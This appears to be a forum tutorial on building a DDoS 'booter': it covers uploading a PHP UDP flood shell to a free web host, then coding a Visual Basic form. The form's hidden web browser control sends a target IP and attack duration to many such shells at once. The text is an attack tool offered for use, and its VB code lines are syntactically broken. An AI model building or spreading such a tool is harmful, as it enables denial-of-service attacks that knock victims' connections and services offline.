What you will need
Vb 2010 express
UDP Shell Source ( you can use a shell online but i dont recomend it)
Ignore the dbprepare at the link

(1:Making the UDP Shell)Make a new Website on SPAM
goto the cpanelgoto file manager
click public_html
check the box by default.php
click delete
go thru with it then click the blue arrow
now click upload
click chose file under files
chose the jure.php
click the green check
click the blue arrow
now go back to the cpanel
now goto your website
it should say Index of /
Jure.php
cllick the jure.php
then take your website and do this (url = website url, filename.php = jure.php)
url.com//filename.php?act=phptools
then theres your shell :D

now its time for the booter
(2:Coding the Booter)
in vb Now make a standard application
and put
•2 Buttons
2 Textboxes
1 Webbrowser
2 labels
on it
•Put the textboxes in order first one will be for the IP address the 2nd one will be for the time.
•Hide webbrowser 1 make it hidden
Rename label 1 to IP
Rename label 2 to Time
Now make A new Form named settings
now go to form1 and double click button 1 and put the code:
webbrowser1.navigate ("Settings.textbox1.text") + TextBox1.Text + "&time=" + TextBox2.Text) and do that for as many shells as you want

webbrowser1.navigate ("Settings.textbox3.text") + TextBox1.Text + "&time=" + TextBox2.Text)
webbrowser1.navigate ("Settings.textbox4.text") + TextBox1.Text + "&time=" + TextBox2.Text)
webbrowser1.navigate ("Settings.textbox5.text") + TextBox1.Text + "&time=" + TextBox2.Text)
webbrowser1.navigate ("Settings.textbox6.text") + TextBox1.Text + "&time=" + TextBox2.Text)
webbrowser1.navigate ("Settings.textbox7.text") + TextBox1.Text + "&time=" + TextBox2.Text)
now go back to settings design
put how many shells you want in as textboxes
and a button :D
on settings double click button 1
and put this code
me.hide
form1.show
on form 1 put 1 more button
and put this code
me.hide
settings.show
and there you go:D just save your shells to a text doc bcuz this does not save them once the program is shut down and pc is restarted the shells are gone just save them to save headache
you can also manualy load a few
